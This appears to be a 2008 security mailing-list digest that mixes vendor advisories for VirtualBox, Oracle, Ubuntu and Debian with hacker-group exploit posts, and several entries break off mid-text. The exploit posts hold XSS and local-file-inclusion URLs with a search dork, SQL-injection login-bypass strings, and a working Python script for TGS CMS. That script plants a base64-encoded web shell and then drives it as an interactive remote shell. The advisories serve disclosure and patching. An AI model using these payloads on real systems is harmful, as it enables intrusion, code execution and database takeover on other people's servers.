Xampp Linux 1.6.7 Multiple Cross Site Scripting Vulnerabilities
Program : Xampp Linux 1.6.7 Type : Multiple Cross Site Scripting Vulnerabilities Alert : Medium Download From : http://puzzle.dl.sourceforge.net/sourceforge/xampp/xampp-linux-1.6.7.tar.gz Discovered by : Khashayar Fereidani Or Dr.Crash My Website : HTTP://FEREIDANI.IR Team Website : Http://IRCRASH.COM Khashayar Fereidani Email : irancrash [ a t ] gmail [ d o t ] com Cross Site Scripting Vulnerabilities : Vulnerability work when register_globals set as on . http://Example.com/xampp/iart.php?text=";>><<>>"''alert(document.alert) http://Example.com/xampp/ming.php?text=";>><<>>"''alert(document.alert) Solution : Remove xampp folder or filter text variable with htmlspecialchars() function Tnx : God HTTP://IRCRASH.COM
CORE-2008-0716 - Sun xVM VirtualBox Privilege Escalation Vulnerability
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
Core Security Technologies - CoreLabs Advisory
http://www.coresecurity.com/corelabs/
Sun xVM VirtualBox Privilege Escalation Vulnerability
*Advisory Information*
Title: Sun xVM VirtualBox Privilege Escalation Vulnerability
Advisory ID: CORE-2008-0716
Advisory URL:
http://www.coresecurity.com/content/virtualbox-privilege-escalation-vulnerability
Date published: 2008-08-04
Date of last update: 2008-08-04
Vendors contacted: Sun Microsystems
Release mode: Coordinated release
*Vulnerability Information*
Class: Insufficient input validation
Remotely Exploitable: No
Locally Exploitable: Yes
Bugtraq ID: 30481
CVE Name: CVE-2008-3431
*Vulnerability Description*
Virtualization technologies allow users to run different operating
systems simultaneously on top of the same set of underlying physical
hardware. This provides several benefits to end users and organizations,
including efficiency gains in the use of hardware resources, reduction
of operational costs, dynamic re-allocation of computing resources and
rapid deployment and configuration of software development and testing
environments.
VirtualBox is an open source virtualization technology project
originally developed by Innotek, a software company based in Germany.
In February 2008 Sun Microsystems announced the acquisition of Innotek
[1] and VirtualBox was integrated into Sun's xVM family of
virtualization technologies. In May 2008, Sun Microsystems announced
that the number of downloads of the open source VirtualBox software
package passed the five million mark [2].
When used on a Windows Host Operating System VirtualBox installs a
kernel driver ('VBoxDrv.sys') to control virtualization of guest
Operating Systems.
An input validation vulnerability was discovered within VirtualBox's
'VBoxDrv.sys' driver that could allow an attacker, with local but
un-privileged access to a host where VirtualBox is installed, to execute
arbitrary code within the kernel of the Windows host operating system
and to gain complete control of a vulnerable computer system.
*Vulnerable Packages*
. Sun xVM VirtualBox 1.6.2.
. Sun xVM VirtualBox 1.6.0.
. This issue only occurs in the Microsoft Windows versions of xVM
VirtualBox.
*Non-vulnerable Packages*
. Sun xVM VirtualBox 1.6.4 (for Microsoft Windows)
*Vendor Information, Solutions and Workarounds*
No workarounds exist for this issue. A security bulletin from the vendor
that describes this issue is available here:
http://sunsolve.sun.com/search/document.do?assetkey=1-66-240095-1.
*Credits*
This vulnerability was discovered and researched by Anibal Sacco from
the CORE IMPACT Exploit Writing Team (EWT) at Core Security Technologies.
*Technical Description / Proof of Concept Code*
When the VirtualBox package is installed on a host the 'VBoxDrv.sys'
driver is loaded on the machine. This driver allows any unprivileged
user to open the device '\\.\VBoxDrv' and issue IOCTLs with a buffering
mode of METHOD_NEITHER without any kind of validation. This allows
untrusted user mode code to pass arbitrary kernel addresses as arguments
to the driver.
With specially constructed input, a malicious user can use functionality
within the driver to patch kernel addresses and execute arbitrary code
in kernel mode. When handling IOCTLs a communication method must be
pre-defined between the user-mode application and the driver module. The
selected method will determine how the I/O Manager manipulates memory
buffers used in the communication.
The 'METHOD_NEITHER' is a very dangerous method because the pointer
passed to 'DeviceIoControl' as input or output buffer will be sent
directly to the driver, thus transferring it the responsibility of doing
the proper checks to validate the addresses sent from user mode.
The 'VBoxDrv.sys' driver uses the 'METHOD_NEITHER' communication method
when handling IOCTLs request and does not validate properly the buffer
sent in the Irp object allowing an attacker to write to any memory
address in the kernel-mode.
Let's see the bug on the source. This is the function used to handle the
IOCTL requests at 'SUPDrv-win.cpp'.
/---
NTSTATUS _stdcall VBoxDrvNtDeviceControl(PDEVICE_OBJECT pDevObj, PIRP
pIrp)
{
PSUPDRVDEVEXT pDevExt = (PSUPDRVDEVEXT)pDevObj->DeviceExtension;
PIO_STACK_LOCATION pStack = IoGetCurrentIrpStackLocation(pIrp);
PSUPDRVSESSION pSession =
(PSUPDRVSESSION)pStack->FileObject->FsContext;
/*
* Deal with the two high-speed IOCtl that takes it's arguments from
* the session and iCmd, and only returns a VBox status code.
*/
ULONG ulCmd = pStack->Parameters.DeviceIoControl.IoControlCode;
if (ulCmd == SUP_IOCTL_FAST_DO_RAW_RUN
(1) || ulCmd == SUP_IOCTL_FAST_DO_HWACC_RUN
|| ulCmd == SUP_IOCTL_FAST_DO_NOP)
{
KIRQL oldIrql;
int rc;
/* Raise the IRQL to DISPATCH_LEVEl to prevent Windows from
rescheduling us to another CPU
Team SHATTER Security Advisory: SQL Injection in Oracle Database (DBMS_DEFER_SYS.DELETE_TRAN)
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Team SHATTER Security Advisory SQL Injection in Oracle Database (DBMS_DEFER_SYS.DELETE_TRAN) August 4, 2008 Risk Level: Medium Affected versions: Oracle Database Server versions 9iR1, 9iR2, 10gR1, 10gR2 and 11gR1 Remote exploitable: Yes (Authentication to Database Server is needed) Credits: This vulnerability was discovered and researched by Esteban Martínez Fayó of Application Security Inc. Details: The PL/SQL package DBMS_DEFER_SYS owned by SYS has an instance of SQL Injection in the DELETE_TRAN procedure. A malicious user can call the vulnerable procedure of this package with specially crafted parameters and execute SQL statements with the elevated privileges of SYS user. Impact: Any Oracle database user with EXECUTE privilege on the package SYS.DBMS_DEFER_SYS can exploit this vulnerability. By default, users granted DBA have the required privilege. Exploitation of this vulnerability allows an attacker to execute SQL commands with SYS privileges. Vendor Status: Vendor was contacted and a patch was released. Workaround: Restrict access to the SYS.DBMS_DEFER_SYS package. Fix: Apply Oracle Critical Patch Update July 2008 available at Oracle Metalink. Links: http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujul2008.html http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2592 Timeline: Vendor Notification - 9/24/2007 Vendor Response - 9/28/2007 Fix - 7/15/2008 Public Disclosure - 7/23/2008 -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.9 (MingW32) iEYEARECAAYFAkiXMToACgkQ9EOAcmTuFN3LGQCeK6pvkshjrIqiw8rdmE8tWIdK O9sAnjeSiwasj2U7SpoPhQVvYKyYvUMI =X2Bp -END PGP SIGNATURE-
Team SHATTER Security Advisory: Cross-site scripting in Oracle Enterprise Manager (REFRESHCHOICE Parameter)
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Team SHATTER Security Advisory Cross-site scripting in Oracle Enterprise Manager (REFRESHCHOICE Parameter) August 4, 2008 Risk Level: High Affected versions: Oracle Enterprise Manager Database Control 10gR1, 10gR2 and 11g (11.1.0.6) Remote exploitable: Yes Credits: This vulnerability was discovered and researched by Esteban Martínez Fayó of Application Security Inc. Details: Cross-site scripting vulnerabilities occur when an attacker tricks a legitimate web application into sending malicious code, generally in the form of a script, to an unsuspecting end user. The attack usually involves crafting a hyperlink with malicious script code embedded within it. A valid user is likely to click this link since it points to a resource on a trusted domain. The link can be posted on a web page, or sent in an instant message, or email. Clicking on the link executes the attacker-injected code in the context of the trusted web application. Typically, the code steals session cookies, which can then be used to impersonate a valid user. The "REFRESHCHOICE" parameter used in web pages of Oracle Enterprise Manager are vulnerable to cross-site scripting attacks. User supplied input to these parameters is returned without proper sanitization, allowing a malicious attacker to inject arbitrary scripting code. Impact: Attackers might steal administrator's session cookies, thereby allowing the attacker to impersonate the valid user. Vendor Status: Vendor was contacted and a patch was released. Workaround: There is no workaround for this issue. Fix: Apply Oracle Critical Patch Update July 2008 available at Oracle Metalink. Links: http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujul2008.html http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2603 Timeline: Vendor Notification - 12/27/2007 Vendor Response - 12/27/2007 Fix - 7/15/2008 Public Disclosure - 7/23/2008 -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.9 (MingW32) iEYEARECAAYFAkiXMa8ACgkQ9EOAcmTuFN33twCfV6yidpr9eAmIbhvBTyY07uE6 RVIAoLKVCD5lsBM0IyksviVGbrhu1tlF =CyQi -END PGP SIGNATURE-
Team SHATTER Security Advisory: SQL Injection in Oracle Application Server (WWEXP_API_ENGINE)
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Team SHATTER Security Advisory SQL Injection in Oracle Application Server (WWEXP_API_ENGINE) Audust 4, 2008 Risk Level: High Affected versions: Oracle Application Server 9.0.4.3, 10.1.2.2 and 10.1.4.1 Remote exploitable: Yes (No authentication required) Credits: This vulnerability was discovered and researched by Esteban Martínez Fayó of Application Security Inc. Details: Oracle Application Server installs the PL/SQL package WWEXP_API_ENGINE owned by PORTAL in the backend Oracle database server. The 'ACTION' procedure of this package has an instance of SQL Injection that allows attackers to create anonymous PL/SQL programs and execute any kind of PL/SQL statements. The statements are executed with the privileges of the PORTAL user, that has DBA privileges. The vulnerability can be exploited using a web application and without authentication. Impact: Exploitation of this vulnerability allows an unauthenticated attacker on the Internet to gain full control of a backend Oracle database server via a vulnerable web site. Vendor Status: Vendor was contacted and a patch was released. Workaround: There is no workaround for this issue. Fix: Apply Oracle Critical Patch Update July 2008 available at Oracle Metalink. Links: http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujul2008.html Timeline: Vendor Notification - 1/3/2008 Vendor Response - 1/8/2008 Fix - 7/15/2008 Public Disclosure - 7/23/2008 -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.9 (MingW32) iEYEARECAAYFAkiXK0EACgkQ9EOAcmTuFN0XTACfVffmDNUHutUYu0+5G5zks/tG m3cAn2pILpcdBbr1Rql7zwerfEjMi9m4 =72Cl -END PGP SIGNATURE-
[USN-626-2] Devhelp, Epiphany, Midbrowser and Yelp update
=== Ubuntu Security Notice USN-626-2August 04, 2008 devhelp, epiphany-browser, midbrowser, yelp update https://launchpad.net/bugs/253462 === A security issue affects the following Ubuntu releases: Ubuntu 8.04 LTS This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu. The problem can be corrected by upgrading your system to the following package versions: Ubuntu 8.04 LTS: devhelp 0.19-1ubuntu1.8.04.3 epiphany-gecko 2.22.2-0ubuntu0.8.04.5 midbrowser 0.3.0rc1a-1~8.04.2 yelp2.22.1-0ubuntu2.8.04.2 After a standard system upgrade you need to restart Devhelp, Epiphany, Midbrowser and Yelp to effect the necessary changes. Details follow: USN-626-1 fixed vulnerabilities in xulrunner-1.9. The changes required that Devhelp, Epiphany, Midbrowser and Yelp also be updated to use the new xulrunner-1.9. Original advisory details: A flaw was discovered in the browser engine. A variable could be made to overflow causing the browser to crash. If a user were tricked into opening a malicious web page, an attacker could cause a denial of service or possibly execute arbitrary code with the privileges of the user invoking the program. (CVE-2008-2785) Billy Rios discovered that Firefox and xulrunner, as used by browsers such as Epiphany, did not properly perform URI splitting with pipe symbols when passed a command-line URI. If Firefox or xulrunner were passed a malicious URL, an attacker may be able to execute local content with chrome privileges. (CVE-2008-2933) Updated packages for Ubuntu 8.04 LTS: Source archives: http://security.ubuntu.com/ubuntu/pool/main/d/devhelp/devhelp_0.19-1ubuntu1.8.04.3.diff.gz Size/MD5:31298 9c7bb3906f79ab2c1f190cbefb703f82 http://security.ubuntu.com/ubuntu/pool/main/d/devhelp/devhelp_0.19-1ubuntu1.8.04.3.dsc Size/MD5: 1114 bb5bf149ce7b8df7a16d7ab7c411d5ed http://security.ubuntu.com/ubuntu/pool/main/d/devhelp/devhelp_0.19.orig.tar.gz Size/MD5: 675357 3a9cb38f83d7f20391b19e305608f289 http://security.ubuntu.com/ubuntu/pool/main/e/epiphany-browser/epiphany-browser_2.22.2-0ubuntu0.8.04.5.diff.gz Size/MD5:41819 89fa0f8815e04a0f634241b6c1f364d3 http://security.ubuntu.com/ubuntu/pool/main/e/epiphany-browser/epiphany-browser_2.22.2-0ubuntu0.8.04.5.dsc Size/MD5: 1589 61c107f668ad8b4aa25c398b0c93fe1d http://security.ubuntu.com/ubuntu/pool/main/e/epiphany-browser/epiphany-browser_2.22.2.orig.tar.gz Size/MD5: 7126288 cdc44e20c2ebaba1fe71c1154030dcd9 http://security.ubuntu.com/ubuntu/pool/main/m/midbrowser/midbrowser_0.3.0rc1a-1~8.04.2.dsc Size/MD5: 1081 fcc8bc8330370aa9df477a6b6f6fb819 http://security.ubuntu.com/ubuntu/pool/main/m/midbrowser/midbrowser_0.3.0rc1a-1~8.04.2.tar.gz Size/MD5: 46625228 e35bc6b300ba8ba6795cc3c8544c1c70 http://security.ubuntu.com/ubuntu/pool/main/y/yelp/yelp_2.22.1-0ubuntu2.8.04.2.diff.gz Size/MD5: 1268814 35076923ad47e759c7944548421dee51 http://security.ubuntu.com/ubuntu/pool/main/y/yelp/yelp_2.22.1-0ubuntu2.8.04.2.dsc Size/MD5: 1230 bd4fda6dd2e3c57f2db67e635e805a5b http://security.ubuntu.com/ubuntu/pool/main/y/yelp/yelp_2.22.1.orig.tar.gz Size/MD5: 1528478 e97a18f7e002d293394726004fc110b7 Architecture independent packages: http://security.ubuntu.com/ubuntu/pool/main/d/devhelp/devhelp-common_0.19-1ubuntu1.8.04.3_all.deb Size/MD5:38486 95c5a3b17fd74b4dd632e7c8a2c559ec http://security.ubuntu.com/ubuntu/pool/main/e/epiphany-browser/epiphany-browser-data_2.22.2-0ubuntu0.8.04.5_all.deb Size/MD5: 3296778 b77676d76c4a5ba0728fca33aadc238a http://security.ubuntu.com/ubuntu/pool/main/e/epiphany-browser/epiphany-browser-dev_2.22.2-0ubuntu0.8.04.5_all.deb Size/MD5: 115802 30f9179b2bbeb7fc0170ec9156deedd5 http://security.ubuntu.com/ubuntu/pool/main/e/epiphany-browser/epiphany-browser_2.22.2-0ubuntu0.8.04.5_all.deb Size/MD5:49494 bb116eb3227198464792497dbf1b1fa3 amd64 architecture (Athlon64, Opteron, EM64T Xeon): http://security.ubuntu.com/ubuntu/pool/main/d/devhelp/devhelp_0.19-1ubuntu1.8.04.3_amd64.deb Size/MD5:17026 5fd05c053b42d0ab1228e97953aa8775 http://security.ubuntu.com/ubuntu/pool/main/d/devhelp/libdevhelp-1-0_0.19-1ubuntu1.8.04.3_amd64.deb Size/MD5: 100988 c8f2b1a6898df9a34715ed306ce0f28d http://security.ubuntu.com/ubuntu/pool/main/d/devhelp/libdevhelp-1-dev_0.19-1ubuntu1.8.04.3_amd64.deb Size/MD5: 6702 35a0280af7c5ad62333b6ad64c612bd9 http://security.ubuntu.com/ubuntu/pool/main/e/epiphany-browser/epiphany-browser-dbg_2.22.2-0ubuntu0.8.04.5_amd64.deb Size/MD5: 1948612 87efe42bb7facafb8f5c24ecb7d256ef http://security.ubuntu.com/ubuntu/pool/m
UNAK-CMS Lfi
# # UNAK-CMS Lfi # # #AUTHOR : IRCRASH (R3d.W0rm (Sina Yazdanmehr)) #Discovered by : IRCRASH (R3d.W0rm (Sina Yazdanmehr)) #Our Site : Http://IRCRASH.COM #IRCRASH Team Members : Dr.Crash - R3d.w0rm (Sina Yazdanmehr) # # #Script Download : www.unak.net # #DORK : "Powered by UNAK-CMS" # # # [Lfi] # #http://Site/fckeditor/editor/filemanager/browser/default/connectors/php/connector.php?Dirroot=/file.type%00 # # # Site : Http://IRCRASH.COM ## TNX GOD ##
[SECURITY] [DSA 1627-1] New opensc packages fix smart card vulnerability
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - Debian Security Advisory DSA-1627-1 [EMAIL PROTECTED] http://www.debian.org/security/ Thijs Kinkhorst August 04, 2008 http://www.debian.org/security/faq - Package: opensc Vulnerability : programming error Problem type : local Debian-specific: no CVE Id(s) : CVE-2008-2235 Chaskiel M Grundman discovered that opensc, a library and utilities to handle smart cards, would initialise smart cards with the Siemens CardOS M4 card operating system without proper access rights. This allowed everyone to change the card's PIN. With this bug anyone can change a user PIN without having the PIN or PUK or the superusers PIN or PUK. However it can not be used to figure out the PIN. If the PIN on your card is still the same you always had, there's a resonable chance that this vulnerability has not been exploited. This vulnerability affects only smart cards and USB crypto tokens based on Siemens CardOS M4, and within that group only those that were initialised with OpenSC. Users of other smart cards and USB crypto tokens, or cards that have been initialised with some software other than OpenSC, are not affected. After upgrading the package, running pkcs15-tool -T will show you whether the card is fine or vulnerable. If the card is vulnerable, you need to update the security setting using: pkcs15-tool -T -U For the stable distribution (etch), this problem has been fixed in version 0.11.1-2etch1. For the unstable distribution (sid), this problem has been fixed in version 0.11.4-4. We recommend that you upgrade your opensc 0.11.1-2etch1 package and check your card(s) with the command described above. Upgrade instructions - wget url will fetch the file for you dpkg -i file.deb will install the referenced file. If you are using the apt-get package manager, use the line for sources.list as given below: apt-get update will update the internal database apt-get upgrade will install corrected packages You may use an automated update by adding the resources from the footer to the proper configuration. Debian GNU/Linux 4.0 alias etch - --- Source archives: http://security.debian.org/pool/updates/main/o/opensc/opensc_0.11.1.orig.tar.gz Size/MD5 checksum: 1263611 94ce00a6bda38fac10ab06f5d5d1a8c3 http://security.debian.org/pool/updates/main/o/opensc/opensc_0.11.1-2etch1.diff.gz Size/MD5 checksum:57052 1b58c5d799d40f645ef3b132c49ab383 http://security.debian.org/pool/updates/main/o/opensc/opensc_0.11.1-2etch1.dsc Size/MD5 checksum: 780 f80a316bdbee0c5132a6ac2200a864ca alpha architecture (DEC Alpha) http://security.debian.org/pool/updates/main/o/opensc/opensc_0.11.1-2etch1_alpha.deb Size/MD5 checksum: 296980 f58a8caa8c2df06057dc0f404798626d http://security.debian.org/pool/updates/main/o/opensc/mozilla-opensc_0.11.1-2etch1_alpha.deb Size/MD5 checksum: 204944 25f4e7077d8e92da0e9f9a8c7a9f243c http://security.debian.org/pool/updates/main/o/opensc/libopensc2-dev_0.11.1-2etch1_alpha.deb Size/MD5 checksum: 727608 12fcf66320b622e2f6887404709b5ab0 http://security.debian.org/pool/updates/main/o/opensc/libopensc2-dbg_0.11.1-2etch1_alpha.deb Size/MD5 checksum: 1077824 44c113c23321766542c653f23cfa57a6 http://security.debian.org/pool/updates/main/o/opensc/libopensc2_0.11.1-2etch1_alpha.deb Size/MD5 checksum: 508220 5853671ce35f9f9d3d9160bdbc715267 amd64 architecture (AMD x86_64 (AMD64)) http://security.debian.org/pool/updates/main/o/opensc/libopensc2-dev_0.11.1-2etch1_amd64.deb Size/MD5 checksum: 576890 ae517b1e8a6e10a0d284c86e470128a9 http://security.debian.org/pool/updates/main/o/opensc/opensc_0.11.1-2etch1_amd64.deb Size/MD5 checksum: 281184 7685b2c13ea0cfe3314d13c1012ead33 http://security.debian.org/pool/updates/main/o/opensc/libopensc2_0.11.1-2etch1_amd64.deb Size/MD5 checksum: 483262 ea2c9a29a9983d02709fe3fdab3639c7 http://security.debian.org/pool/updates/main/o/opensc/libopensc2-dbg_0.11.1-2etch1_amd64.deb Size/MD5 checksum: 1069104 5c79b0e8705ed7c74eead212f3dff5fd http://security.debian.org/pool/updates/main/o/opensc/mozilla-opensc_0.11.1-2etch1_amd64.deb Size/MD5 checksum: 199942 68a206307bc51ef6f0e3354f77c7b689 arm architecture (ARM) http://security.debian.org/pool/updates/main/o/opensc/libopensc2-dev_0.11.1-2etch1_arm.deb Size/MD5 checksum: 529872 6fcea50e6d9f2798e57b7a95a9d1b32b http://security.debian.org/pool/updates/main/o/opensc/opensc_0.11.1-2etch1_arm.deb Size/MD5 checksum: 269136 4d0f5d069408f36662eea22a7162cc12 http://security.debian.org/pool/updates/main/o/opensc/libopensc2_0.11.1-2etch1_arm.deb Size/MD5 checksum: 45
TGS CMS Remote Code Execution Exploit
# TGS CMS Remote Code Execution Exploit
# by 0in
# from Dark-Coders Group!
# www.dark-coders.pl
# Contact: 0in(dot)email[at]gmail(dot)com
# Greetings to:die_angel,suN8Hclf,m4r1usz,cOndemned,str0ke
# Dork:NULL - because "You cannot kill what you did not create" <- Duality by
Slipknot
# Let's analyze the vuln:
# We've got the: /cms/admin/admin.template_engine.php
# first line:"template_dir= "'.$_POST['template_dir'].'";
# 78:$tgs_template->config_dir = "'.$_POST['config_dir'].'";
# 79:$tgs_template->cms_dir = "'.$_POST['cms_dir'].'";
# 80:$tgs_template->left_delimiter = "'.$_POST['left_delimiter'].'";
# 81:$tgs_template->right_delimiter = "'.$_POST['right_delimiter'].'";
# And.. boom!
# 89: if (@fwrite($handle,$content)) {
# Just simply exploit for fun:
import httplib
import urllib
print "TGS CMS Remote Code Execution Exploit"
print "by 0in From Dark-Coders Group"
print "www.dark-coders.pl"
print 'Enter target:'
target=raw_input()
print 'Enter path:'
path=raw_input()
inject="\";error_reporting(0);eval(base64_decode(\"JGNtZD0kX0dFVFsnenVvJ107c3lzdGVtKCRjbWQpO2V4aXQ7\"));//"
exploit=httplib.HTTPConnection(target+':80')
headers={'Content-type':'application/x-www-form-urlencoded',"Accept":"text/plain"}
data=urllib.urlencode({'right_delimiter':inject})
exploit.request("POST",path+"/cms/admin/admin.template_engine.php?option=set_template",data,headers)
print exploit.getresponse().read()
while(1):
cmd=raw_input("[shell@"+target+"]#")
if(cmd=='exit'):
quit()
shell=httplib.HTTPConnection(target+':80')
shell.request("GET",path+"/cms/index.php?zuo="+cmd)
print shell.getresponse().read()
Keld: PHP-MySQL News Script 0.7.1 Remote SQL injection Vulnerability
]#;#;#;#;#;#;#;#;#;#;#;#;#;#;#;#;##;#;#;#;#;#;#;#;#;#;#;#;#;#;#;#;##;#;#;#;#;#;#;#;#;#[
]
[
]Name : Keld: PHP-MySQL News Script 0.7.1 Remote SQL injection
Vulnerability[
]Author: suN8Hclf[crimsoN_Loyd9], DaRk-CodeRs Group
[
]Source: http://sourceforge.net/project/showfiles.php?group_id=26365
[
]Greetz: c0ndemned, 0in and other DaRk-CodeRs guys, wizZ
[
]
[
]#;#;#;#;#;#;#;#;#;#;#;#;#;#;#;#;##;#;#;#;#;#;#;#;#;#;#;#;#;#;#;#;##;#;#;#;#;#;#;#;#;#[
Conditions: MAGIC_QUOTES=OFF
Vulnerable Code(login.php):
---CODE
(login.php)
mysql_select_db($db);
$query = mysql_query("select id,password from users where name = '$username'
and password = password('$pass')");
if(mysql_num_rows($query) == 1)
---
Exploit:
All strings should be put down into username box in login.php
[1]. Login bypass
A. admin' OR 1=1/*
DESC: This will log us into the admin's account
B. fdfds' OR 1=1 limit x/*
where x - from 0 to... i dont know ;)
DESC: This will log us into the user's account which is x-nd in the table
[2]. Classic Remote SQL Injection
' AND 1=2 union select 1,2/*
